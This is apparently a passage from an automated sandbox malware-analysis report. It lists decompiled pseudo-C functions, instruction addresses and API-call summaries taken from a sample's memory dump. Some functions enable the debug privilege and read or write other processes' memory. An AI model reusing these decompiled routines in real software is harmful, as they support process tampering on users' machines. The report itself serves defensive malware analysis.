      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
    • LocalFree.KERNEL32(?), ref: 00F63634
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F64E29, Relevance: 7.6, APIs: 5, Instructions: 98
    C-Code - Quality: 24%
    			E00F64E29(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				intOrPtr* _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr* _t52;
				intOrPtr* _t54;
				void* _t55;
				void* _t57;

				_push(0x20);
				_push(0xf69e98);
				E00F65910(__ebx, __edi, __esi);
				E00F66117(__ebx, __edi, 8);
				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
				_t57 =  *0xf6c030 - 1; // 0x0
				if(_t57 != 0) {
					 *0xf6c02c = 1;
					_t34 =  *((intOrPtr*)(_t55 + 0x10));
					 *0xf6c028 =  *((intOrPtr*)(_t55 + 0x10));
					if( *((intOrPtr*)(_t55 + 0xc)) == 0) {
						_t54 = __imp__DecodePointer;
						_t34 =  *_t54( *0xf6cea8);
						_t45 = 1;
						 *((intOrPtr*)(_t55 - 0x30)) = 1;
						if(1 != 0) {
							_t34 =  *_t54( *0xf6cea4);
							_t52 = 1;
							 *((intOrPtr*)(_t55 - 0x2c)) = 1;
							 *((intOrPtr*)(_t55 - 0x24)) = 1;
							 *((intOrPtr*)(_t55 - 0x28)) = 1;
							while(1) {
								_t52 = _t52 - 4;
								 *((intOrPtr*)(_t55 - 0x2c)) = _t52;
								if(_t52 < _t45) {
									goto L11;
								}
								if( *_t52 == _t34) {
									continue;
								} else {
									if(_t52 >= _t45) {
										_t40 =  *_t54( *_t52);
										 *_t52 = E00F64593(_t40);
										 *_t40();
										_t47 =  *_t54( *0xf6cea8);
										_t34 =  *_t54( *0xf6cea4);
										if( *((intOrPtr*)(_t55 - 0x24)) != _t47 ||  *((intOrPtr*)(_t55 - 0x28)) != _t34) {
											 *((intOrPtr*)(_t55 - 0x24)) = _t47;
											 *((intOrPtr*)(_t55 - 0x30)) = _t47;
											 *((intOrPtr*)(_t55 - 0x28)) = _t34;
											_t52 = _t34;
											 *((intOrPtr*)(_t55 - 0x2c)) = _t52;
										}
										_t45 =  *((intOrPtr*)(_t55 - 0x30));
										continue;
									}
								}
								goto L11;
							}
						}
						L11:
						 *((intOrPtr*)(_t55 - 0x1c)) = 0xf68184;
						while( *((intOrPtr*)(_t55 - 0x1c)) < 0xf68188) {
							_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t55 - 0x1c))));
							if(_t34 != 0) {
								_t34 =  *_t34();
							}
							 *((intOrPtr*)(_t55 - 0x1c)) =  *((intOrPtr*)(_t55 - 0x1c)) + 4;
						}
					}
					 *((intOrPtr*)(_t55 - 0x20)) = 0xf6818c;
					while( *((intOrPtr*)(_t55 - 0x20)) < 0xf68190) {
						_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t55 - 0x20))));
						if(_t34 != 0) {
							_t34 =  *_t34();
						}
						 *((intOrPtr*)(_t55 - 0x20)) =  *((intOrPtr*)(_t55 - 0x20)) + 4;
					}
				}
				 *(_t55 - 4) = 0xfffffffe;
				L23();
				if( *((intOrPtr*)(_t55 + 0x10)) != 0) {
					return E00F65955(_t34);
				} else {
					 *0xf6c030 = 1;
					_t36 = E00F6603E(8);
					E00F64D11( *((intOrPtr*)(_t55 + 8))); // executed
					if( *((intOrPtr*)(_t55 + 0x10)) != 0) {
						return E00F6603E(8);
					}
					return _t36;
				}
			}











    0x00f64e29
    0x00f64e2b
    0x00f64e30
    0x00f64e37
    0x00f64e3d
    0x00f64e44
    0x00f64e4a
    0x00f64e50
    0x00f64e55
    0x00f64e58
    0x00f64e61
    0x00f64e6d
    0x00f64e73
    0x00f64e75
    0x00f64e77
    0x00f64e7c
    0x00f64e84
    0x00f64e86
    0x00f64e88
    0x00f64e8b
    0x00f64e8e
    0x00f64e91
    0x00f64e91
    0x00f64e94
    0x00f64e99
    0x00000000
    0x00000000
    0x00f64ea2
    0x00000000
    0x00f64ea4
    0x00f64ea6
    0x00f64eaa
    0x00f64eb3
    0x00f64eb5
    0x00f64ebf
    0x00f64ec7
    0x00f64ecc
    0x00f64ed3
    0x00f64ed6
    0x00f64ed9
    0x00f64edc
    0x00f64ede
    0x00f64ede
    0x00f64ee1
    0x00000000
    0x00f64ee1
    0x00f64ea6
    0x00000000
    0x00f64ea2
    0x00f64e91
    0x00f64ee6
    0x00f64ee6
    0x00f64eed
    0x00f64ef9
    0x00f64efd
    0x00f64eff
    0x00f64eff
    0x00f64f01
    0x00f64f01
    0x00f64eed
    0x00f64f07
    0x00f64f0e
    0x00f64f1a
    0x00f64f1e
    0x00f64f20
    0x00f64f20
    0x00f64f22
    0x00f64f22
    0x00f64f0e
    0x00f64f28
    0x00f64f2f
    0x00f64f38
    0x00f64f68
    0x00f64f3a
    0x00f64f3a
    0x00f64f46
    0x00f64f4f
    0x00f64f58
    0x00000000
    0x00f64f61
    0x00f64f62
    0x00f64f62

    APIs
      • Part of subcall function 00F66117: __amsg_exit.LIBCMT ref: 00F66139
      • Part of subcall function 00F66117: EnterCriticalSection.KERNEL32(?,?,?,00F64660,0000000D), ref: 00F66141
    • DecodePointer.KERNEL32(00F69E98,00000020,00F64F90,00000000,00000001,00000000,?,00F64FD0,000000FF,?,00F6613E,00000011,?,?,00F64660,0000000D), ref: 00F64E73
    • DecodePointer.KERNEL32(?,00F64FD0,000000FF,?,00F6613E,00000011,?,?,00F64660,0000000D), ref: 00F64E84
      • Part of subcall function 00F64593: EncodePointer.KERNEL32(00000000,00F67272,00F6C038,00000314,00000000,?,?,?,?,?,00F65134,00F6C038,Microsoft Visual C++ Runtime Library,00012010), ref: 00F64595
    • DecodePointer.KERNEL32(-00000004,?,00F64FD0,000000FF,?,00F6613E,00000011,?,?,00F64660,0000000D), ref: 00F64EAA
    • DecodePointer.KERNEL32(?,00F64FD0,000000FF,?,00F6613E,00000011,?,?,00F64660,0000000D), ref: 00F64EBD
    • DecodePointer.KERNEL32(?,00F64FD0,000000FF,?,00F6613E,00000011,?,?,00F64660,0000000D), ref: 00F64EC7
      • Part of subcall function 00F6603E: LeaveCriticalSection.KERNEL32(?,00F66115,0000000A,00F66105,00F69EB8,0000000C,00F66132,00000000,?,?,00F64660,0000000D), ref: 00F6604D
      • Part of subcall function 00F64D11: ExitProcess.KERNEL32 ref: 00F64D22
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F66F94, Relevance: 7.6, APIs: 5, Instructions: 74
    C-Code - Quality: 21%
    			E00F66F94(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t11;
				intOrPtr _t13;
				void* _t19;
				intOrPtr _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t36;
				intOrPtr* _t37;
				void* _t39;
				intOrPtr* _t40;
				intOrPtr* _t41;

				_t40 = __imp__DecodePointer;
				_t11 =  *_t40( *0xf6cea8, _t33, _t39, _t23, _t27);
				_t24 = _t11;
				_v8 = _t24;
				_t41 =  *_t40( *0xf6cea4);
				if(_t41 < _t24) {
					L11:
					_t13 = 0;
				} else {
					_t36 = _t41 - _t24;
					_t2 = _t36 + 4; // 0x4
					if(_t2 < 4) {
						goto L11;
					} else {
						_t26 = E00F67C27(_t24);
						_t3 = _t36 + 4; // 0x4
						if(_t26 >= _t3) {
							L10:
							_t37 = __imp__EncodePointer;
							 *_t41 =  *_t37(_a4);
							 *0xf6cea4 =  *_t37(_t41 + 4);
							_t13 = _a4;
						} else {
							_t19 = 0x800;
							if(_t26 < 0x800) {
								_t19 = _t26;
							}
							_t20 = _t19 + _t26;
							if(_t19 + _t26 < _t26) {
								L7:
								_t5 = _t26 + 0x10; // 0x10
								_t21 = _t5;
								if(_t5 < _t26) {
									goto L11;
								} else {
									_t22 = E00F66215(_v8, _t21);
									if(_t22 == 0) {
										goto L11;
									} else {
										goto L9;
									}
								}
							} else {
								_t22 = E00F66215(_v8, _t20);
								if(_t22 != 0) {
									L9:
									_t41 = _t22 + (_t36 >> 2) * 4;
									__imp__EncodePointer(_t22);
									 *0xf6cea8 = _t22;
									goto L10;
								} else {
									goto L7;
								}
							}
						}
					}
				}
				return _t13;
			}


















    0x00f66f9c
    0x00f66fa9
    0x00f66fb1
    0x00f66fb3
    0x00f66fb8
    0x00f66fbc
    0x00f67043
    0x00f67043
    0x00f66fc2
    0x00f66fc4
    0x00f66fc6
    0x00f66fcc
    0x00000000
    0x00f66fce
    0x00f66fd4
    0x00f66fd6
    0x00f66fdc
    0x00f67026
    0x00f67029
    0x00f67031
    0x00f67039
    0x00f6703e
    0x00f66fde
    0x00f66fde
    0x00f66fe5
    0x00f66fe7
    0x00f66fe7
    0x00f66fe9
    0x00f66fed
    0x00f66ffe
    0x00f66ffe
    0x00f66ffe
    0x00f67003
    0x00000000
    0x00f67005
    0x00f67009
    0x00f67012
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00f67012
    0x00f66fef
    0x00f66ff3
    0x00f66ffc
    0x00f67014
    0x00f67018
    0x00f6701b
    0x00f67021
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00f66ffc
    0x00f66fed
    0x00f66fdc
    0x00f66fcc
    0x00f67049

    APIs
    • DecodePointer.KERNEL32(?,?,?,?,?,00F67098,?,00F69F18,0000000C,00F670C4,?,?,00F64DDF,00F658CC), ref: 00F66FA9
    • DecodePointer.KERNEL32(?,?,?,?,?,00F67098,?,00F69F18,0000000C,00F670C4,?,?,00F64DDF,00F658CC), ref: 00F66FB6
      • Part of subcall function 00F67C27: HeapSize.KERNEL32(00000000,00000000,?,00000003,00F66D23,00F69ED8,00000008,00F64CD2), ref: 00F67C52
      • Part of subcall function 00F66215: Sleep.KERNEL32(00000000,00000000,00000000,?,00F6700E,00000000,00000010,?,?,?,?,?,00F67098,?,00F69F18,0000000C), ref: 00F6623F
    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,00F67098,?,00F69F18,0000000C,00F670C4,?,?,00F64DDF,00F658CC), ref: 00F6701B
    • EncodePointer.KERNEL32(?,?,?,?,?,?,00F67098,?,00F69F18,0000000C,00F670C4,?,?,00F64DDF,00F658CC), ref: 00F6702F
    • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,00F67098,?,00F69F18,0000000C,00F670C4,?,?,00F64DDF,00F658CC), ref: 00F67037
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F61EFA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
    C-Code - Quality: 88%
    			E00F61EFA(intOrPtr __ecx, void* __esi) {
				char* _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _t17;
				signed int _t19;
				char _t22;
				intOrPtr _t26;
				char _t28;

				_t28 = 0;
				_v8 =  &_v20;
				_t17 =  *((intOrPtr*)(__esi + 4));
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v28 = _t17;
				_v24 = __ecx;
				 *((intOrPtr*)(__esi + 4)) = 0;
				if(_t17 != 0) {
					_t19 =  *(__esi + 2) & 0x0000ffff;
					if(_t19 != 0) {
						_push(_t19);
						_push(0x40);
						_t22 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
						_v12 = _t22;
						if(_t22 != 0) {
							 *((intOrPtr*)(__esi + 4)) = _t22;
							_t26 = E00F61149( &_v12,  &_v28,  *(__esi + 2) & 0x0000ffff); // executed
							_t28 = _t26;
						}
					}
				}
				return _t28;
			}














    0x00f61f04
    0x00f61f06
    0x00f61f09
    0x00f61f0c
    0x00f61f0f
    0x00f61f12
    0x00f61f15
    0x00f61f18
    0x00f61f1b
    0x00f61f20
    0x00f61f22
    0x00f61f29
    0x00f61f2b
    0x00f61f2c
    0x00f61f45
    0x00f61f47
    0x00f61f4c
    0x00f61f4e
    0x00f61f5e
    0x00f61f66
    0x00f61f66
    0x00f61f4c
    0x00f61f29
    0x00f61f6c

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F61F38
    • GetProcAddress.KERNEL32(00000000), ref: 00F61F3F
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F620B7, Relevance: 4.5, APIs: 3, Instructions: 37
    C-Code - Quality: 79%
    			E00F620B7(char _a4, intOrPtr _a8) {
				long _t7;
				void* _t8;
				intOrPtr _t12;

				if(_a4 > 1) {
					 *0xf6bfb8 = E00F61FEC( *((intOrPtr*)(_a8 + 4)));
				}
				__imp__RtlGetNtVersionNumbers(0xf6cfd0, 0xf6cfcc, 0xf6cfd4);
				 *0xf6cfd4 =  *0xf6cfd4 & 0x00003fff;
				_t7 = RtlAdjustPrivilege(0x14, 1, 0,  &_a4); // executed
				if(_t7 >= 0) {
					 *0xf6cec0 = 0xf69d1c;
					if( *0xf6cfd0 >= 6) {
						 *0xf6cec0 = 0xf69d30; // executed
					}
					E00F632E4();
					_t12 =  *0xf6cec0; // 0x0
					 *((intOrPtr*)(_t12 + 4))();
				}
				_t8 =  *0xf6bfb8; // 0xffffffff
				if(_t8 != 0xffffffff) {
					CloseHandle(_t8);
				}
				return 0;
			}






    0x00f620be
    0x00f620cc
    0x00f620cc
    0x00f620e0
    0x00f620e6
    0x00f620fa
    0x00f62102
    0x00f6210b
    0x00f62115
    0x00f62117
    0x00f62117
    0x00f62121
    0x00f62126
    0x00f6212b
    0x00f6212b
    0x00f6212e
    0x00f62136
    0x00f62139
    0x00f62139
    0x00f62142

    APIs
    • RtlGetNtVersionNumbers.NTDLL(00F6CFD0,00F6CFCC,00F6CFD4), ref: 00F620E0
    • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,00000001), ref: 00F620FA
    • CloseHandle.KERNEL32(FFFFFFFF), ref: 00F62139
      • Part of subcall function 00F61FEC: GetProcessHeap.KERNEL32 ref: 00F62013
      • Part of subcall function 00F61FEC: HeapAlloc.KERNEL32(00000000), ref: 00F6201A
      • Part of subcall function 00F61FEC: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00F6202F
      • Part of subcall function 00F61FEC: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 00F62041
      • Part of subcall function 00F61FEC: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00F62065
      • Part of subcall function 00F61FEC: GetModuleHandleW.KERNEL32(kernel32,GetLastError), ref: 00F6207C
      • Part of subcall function 00F61FEC: GetProcAddress.KERNEL32(00000000), ref: 00F62083
      • Part of subcall function 00F61FEC: Sleep.KERNEL32(00000BB8), ref: 00F62093
      • Part of subcall function 00F61FEC: WaitNamedPipeW.KERNEL32(?,00000BB8), ref: 00F6209F
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F65329, Relevance: 3.1, APIs: 2, Instructions: 131
    C-Code - Quality: 90%
    			E00F65329(signed int __eax, void* __ebx, signed int** _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				signed int _t34;
				signed int _t36;
				signed int _t39;
				void* _t40;
				signed int _t41;
				void* _t42;
				signed short* _t44;
				signed int** _t45;
				void* _t46;
				signed int _t47;
				signed int* _t55;
				signed int _t56;
				signed int _t57;
				signed int _t58;
				signed int _t60;
				signed int _t69;
				unsigned int _t71;
				signed int _t73;
				signed int _t75;
				intOrPtr* _t77;
				void* _t80;
				signed short* _t82;
				signed int _t83;
				signed int* _t85;
				void* _t90;

				_t46 = __ebx;
				_t82 =  *0xf6bfc4; // 0x0
				_t73 = 0;
				if(_t82 != 0) {
					while(1) {
						_t34 =  *_t82 & 0x0000ffff;
						if(_t34 != 0) {
							if(_t34 != 0x3d) {
								_t73 = _t73 + 1;
							}
						} else {
							break;
						}
						_t82 = _t82 + 2 + E00F674FA(_t82) * 2;
					}
					_push(_t46);
					_t36 = E00F661C9(_t73 + 1, 4);
					_t47 = _t36;
					 *0xf6c018 = _t47;
					if(_t47 != 0) {
						_t83 =  *0xf6bfc4; // 0x0
						while( *_t83 != 0) {
							_t4 = E00F674FA(_t83) + 1; // 0x1
							_t75 = _t4;
							if( *_t83 == 0x3d) {
								L13:
								_t83 = _t83 + _t75 * 2;
								continue;
							} else {
								_t40 = E00F661C9(_t75, 2); // executed
								_pop(_t55);
								 *_t47 = _t40;
								if(_t40 == 0) {
									_t41 = E00F6614A( *0xf6c018);
									 *0xf6c018 =  *0xf6c018 & 0x00000000;
									_t39 = _t41 | 0xffffffff;
									L16:
									goto L17;
								} else {
									_t42 = E00F67515(_t40, _t75, _t83);
									_t90 = _t90 + 0xc;
									if(_t42 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_t44 = E00F64BDF();
										asm("int3");
										_push(_t55);
										_push(_t83);
										_t69 = 0;
										_push(_t75);
										_t77 = _v24;
										 *_t47 = 0;
										_t85 = _t55;
										 *_t77 = 1;
										if(_v28 != 0) {
											_a4 =  &(_a4[1]);
											 *_a4 = _t85;
										}
										do {
											if( *_t44 != 0x22) {
												 *_t47 =  *_t47 + 1;
												if(_t85 != 0) {
													 *_t85 =  *_t44;
													_t85 =  &(_t85[0]);
												}
												_t56 =  *_t44 & 0x0000ffff;
												_t44 =  &(_t44[1]);
												if(_t56 == 0) {
													_t44 = _t44 - 2;
												} else {
													goto L28;
												}
											} else {
												_t77 = _a8;
												_t44 =  &(_t44[1]);
												_t69 = 0 | _t69 == 0x00000000;
												_t56 = 0x22;
												goto L28;
											}
											L33:
											_v8 = _v8 & 0x00000000;
											L34:
											while( *_t44 != 0) {
												while(1) {
													_t57 =  *_t44 & 0x0000ffff;
													if(_t57 != 0x20 && _t57 != 9) {
														break;
													}
													_t44 =  &(_t44[1]);
												}
												if( *_t44 != 0) {
													if(_a4 != 0) {
														_a4 =  &(_a4[1]);
														 *_a4 = _t85;
													}
													 *_t77 =  *_t77 + 1;
													while(1) {
														_t80 = 1;
														_t71 = 0;
														L45:
														while( *_t44 == 0x5c) {
															_t44 =  &(_t44[1]);
															_t71 = _t71 + 1;
														}
														if( *_t44 == 0x22) {
															if((_t71 & 0x00000001) == 0) {
																if(_v8 == 0 || _t44[1] != 0x22) {
																	_t80 = 0;
																	_v8 = 0 | _v8 == 0x00000000;
																} else {
																	_t44 =  &(_t44[1]);
																}
															}
															_t71 = _t71 >> 1;
														}
														while(_t71 != 0) {
															_t71 = _t71 - 1;
															if(_t85 != 0) {
																_t60 = 0x5c;
																 *_t85 = _t60;
																_t85 =  &(_t85[0]);
															}
															 *_t47 =  *_t47 + 1;
														}
														_t58 =  *_t44 & 0x0000ffff;
														if(_t58 != 0 && (_v8 != _t71 || _t58 != 0x20 && _t58 != 9)) {
															if(_t80 != 0) {
																if(_t85 != 0) {
																	 *_t85 = _t58;
																	_t85 =  &(_t85[0]);
																}
																 *_t47 =  *_t47 + 1;
															}
															_t44 =  &(_t44[1]);
															_t80 = 1;
															_t71 = 0;
															goto L45;
														}
														if(_t85 != 0) {
															 *_t85 = 0;
															_t85 =  &(_t85[0]);
														}
														 *_t47 =  *_t47 + 1;
														_t77 = _a8;
														goto L34;
													}
												}
												break;
											}
											_t45 = _a4;
											if(_t45 != 0) {
												 *_t45 = 0;
											}
											 *_t77 =  *_t77 + 1;
											return _t45;
											goto L72;
											L28:
										} while (_t69 != 0 || _t56 != 0x20 && _t56 != 9);
										if(_t85 != 0) {
											 *((short*)(_t85 - 2)) = 0;
										}
										goto L33;
									} else {
										_t47 = _t47 + 4;
										goto L13;
									}
								}
							}
							goto L72;
						}
						E00F6614A( *0xf6bfc4);
						 *0xf6bfc4 =  *0xf6bfc4 & 0x00000000;
						 *_t47 =  *_t47 & 0x00000000;
						 *0xf6cea0 = 1;
						_t39 = 0;
						goto L16;
					} else {
						_t39 = _t36 | 0xffffffff;
						L17:
						goto L18;
					}
				} else {
					_t39 = __eax | 0xffffffff;
					L18:
					return _t39;
				}
				L72:
			}































    0x00f65329
    0x00f6532c
    0x00f65333
    0x00f65337
    0x00f65353
    0x00f65353
    0x00f65359
    0x00f65345
    0x00f65347
    0x00f65347
    0x00000000
    0x00000000
    0x00000000
    0x00f6534f
    0x00f6534f
    0x00f6535b
    0x00f65360
    0x00f65365
    0x00f65369
    0x00f65371
    0x00f65378
    0x00f653b5
    0x00f6538b
    0x00f6538b
    0x00f6538e
    0x00f653b2
    0x00f653b2
    0x00000000
    0x00f65390
    0x00f65393
    0x00f65399
    0x00f6539a
    0x00f6539e
    0x00f653e7
    0x00f653ec
    0x00f653f3
    0x00f653dc
    0x00000000
    0x00f653a0
    0x00f653a3
    0x00f653a8
    0x00f653ad
    0x00f653fa
    0x00f653fb
    0x00f653fc
    0x00f653fd
    0x00f653fe
    0x00f653ff
    0x00f65404
    0x00f6540a
    0x00f6540b
    0x00f6540c
    0x00f6540e
    0x00f6540f
    0x00f65412
    0x00f65414
    0x00f65416
    0x00f6541f
    0x00f65424
    0x00f65428
    0x00f65428
    0x00f6542a
    0x00f6542e
    0x00f65444
    0x00f65448
    0x00f6544d
    0x00f65450
    0x00f65450
    0x00f65453
    0x00f65456
    0x00f6545c
    0x00f65499
    0x00000000
    0x00000000
    0x00000000
    0x00f65430
    0x00f65430
    0x00f6543c
    0x00f6543f
    0x00f65441
    0x00000000
    0x00f65441
    0x00f65478
    0x00f65478
    0x00000000
    0x00f6547c
    0x00f65487
    0x00f65487
    0x00f6548d
    0x00000000
    0x00000000
    0x00f65494
    0x00f65494
    0x00f654a1
    0x00f654aa
    0x00f654af
    0x00f654b3
    0x00f654b3
    0x00f654b5
    0x00f654b7
    0x00f654b9
    0x00f654ba
    0x00000000
    0x00f654c2
    0x00f654be
    0x00f654c1
    0x00f654c1
    0x00f654cc
    0x00f654d1
    0x00f654d7
    0x00f654e7
    0x00f654ef
    0x00f654e0
    0x00f654e0
    0x00f654e0
    0x00f654d7
    0x00f654f2
    0x00f654f2
    0x00f65506
    0x00f654f6
    0x00f654f9
    0x00f654fd
    0x00f654fe
    0x00f65501
    0x00f65501
    0x00f65504
    0x00f65504
    0x00f6550a
    0x00f65510
    0x00f65523
    0x00f65527
    0x00f65529
    0x00f6552c
    0x00f6552c
    0x00f6552f
    0x00f6552f
    0x00f65531
    0x00f654b9
    0x00f654ba
    0x00000000
    0x00f654bc
    0x00f65538
    0x00f6553c
    0x00f6553f
    0x00f6553f
    0x00f65542
    0x00f65544
    0x00000000
    0x00f65544
    0x00f654b7
    0x00000000
    0x00f654a1
    0x00f6554c
    0x00f65551
    0x00f65553
    0x00f65553
    0x00f65555
    0x00f6555a
    0x00000000
    0x00f6545e
    0x00f6545e
    0x00f65470
    0x00f65474
    0x00f65474
    0x00000000
    0x00f653af
    0x00f653af
    0x00000000
    0x00f653af
    0x00f653ad
    0x00f6539e
    0x00000000
    0x00f6538e
    0x00f653c1
    0x00f653c6
    0x00f653cd
    0x00f653d0
    0x00f653da
    0x00000000
    0x00f65373
    0x00f65373
    0x00f653dd
    0x00000000
    0x00f653dd
    0x00f65339
    0x00f65339
    0x00f653de
    0x00f653e0
    0x00f653e0
    0x00000000

    APIs
    • _wcslen.LIBCMT ref: 00F65349
      • Part of subcall function 00F661C9: Sleep.KERNEL32(00000000), ref: 00F661F1
    • _wcslen.LIBCMT ref: 00F65381
      • Part of subcall function 00F6614A: HeapFree.KERNEL32(00000000,00000000,?,00F64734,00000000,?,?,00F6474B,?,00F63785), ref: 00F66160
      • Part of subcall function 00F6614A: GetLastError.KERNEL32(00000000,?,00F64734,00000000,?,?,00F6474B,?,00F63785), ref: 00F66172
      • Part of subcall function 00F64BDF: GetCurrentProcess.KERNEL32(C0000417), ref: 00F64BF5
      • Part of subcall function 00F64BDF: TerminateProcess.KERNEL32(00000000), ref: 00F64BFC
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F64D92, Relevance: 1.6, APIs: 1, Instructions: 54
    C-Code - Quality: 23%
    			E00F64D92(void* __edi, void* __esi, intOrPtr _a4) {
				void* _t4;
				intOrPtr* _t10;
				void* _t18;
				intOrPtr* _t19;
				void* _t21;

				_t21 = __esi;
				_t18 = __edi;
				_t24 =  *0xf6ceb0;
				if( *0xf6ceb0 != 0 && E00F67190(_t24, 0xf6ceb0) != 0) {
					_t2 =  *0xf6ceb0(_a4);
				}
				E00F670CE(_t2);
				_t4 = E00F64D6E(0xf6816c, 0xf68180);
				_t26 = _t4;
				if(_t4 == 0) {
					_push(_t21);
					_push(_t18);
					E00F670B7(_t26, E00F658CC);
					_t19 = 0xf68164;
					if(0xf68164 >= 0xf68168) {
						L8:
						_t30 =  *0xf6ceb4;
						if( *0xf6ceb4 != 0 && E00F67190(_t30, 0xf6ceb4) != 0) {
							 *0xf6ceb4(0, 2, 0);
						}
						return 0;
					} else {
						goto L5;
					}
					do {
						L5:
						_t10 =  *_t19;
						if(_t10 != 0) {
							 *_t10();
						}
						_t19 = _t19 + 4;
					} while (_t19 < 0xf68168);
					goto L8;
				}
				return _t4;
			}








    0x00f64d92
    0x00f64d92
    0x00f64d97
    0x00f64d9e
    0x00f64db2
    0x00f64db8
    0x00f64db9
    0x00f64dc8
    0x00f64dcf
    0x00f64dd1
    0x00f64dd3
    0x00f64dd4
    0x00f64dda
    0x00f64dea
    0x00f64dee
    0x00f64dff
